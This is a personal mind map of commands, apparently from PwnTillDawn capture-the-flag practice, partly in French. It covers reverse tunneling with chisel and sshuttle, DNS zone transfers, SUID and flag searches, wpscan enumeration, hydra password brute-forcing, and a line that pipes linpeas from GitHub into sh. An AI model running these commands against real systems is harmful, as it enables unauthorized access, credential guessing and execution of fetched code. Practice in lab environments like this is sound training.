Mind map I made while working through some PwnTillDawn boxes
sshuttle -r user@ip -N
Sur la victime
./chisel client ip_host:7777 R:8080:127.0.0.1:8080
Ne pas oublier d'adapter le port 8080 selon les situations
Sur l'host
chisel server -port 7777 --reverse
Subtopic
dig @mortysserver.com mortysserver.com axfr
Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com
ssh -i id_rsa user@ip
Mettre en place un listener au préalable
Download file
Copy-Item 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z' -Destination 'C:\Users\f.frizzle\Desktop\\wapt-backup-sunday.7z'
Find file
(New-Object -ComObject Shell.Application).Namespace(0xA).Items() | ForEach-Object { "$($_.Name) - $($_.Path)" }
grep -r pattern
search in files recursively (-r / --recursive)
find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null
find ./* | grep FLAG3
find / \( -name ".env" -o -name ".git" \) 2>/dev/null
find / -type f -name 'FLAG[0-9].txt' 2>/dev/null
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
find / -perm -u=s -type f 2>/dev/null
ln -s /root /home/michael/importantfiles/rootbackup
searchsploit -m chemin
searchsploit xxxx
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
multi/recon/local_exploit_suggester
wpscan --url url_wordpress --passwords wordlist
wpscan --url url --enumerate u
wpscan --url url --enumerate vp,vt
https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
Dirsearch
FeroxBuster
feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404
feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404
-k pour un certificat autosigné
hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
hydra -l operator -P wordlist.txt 10.150.150.56
python3 depix.py -p pixel_image -s images/searchimages/image.png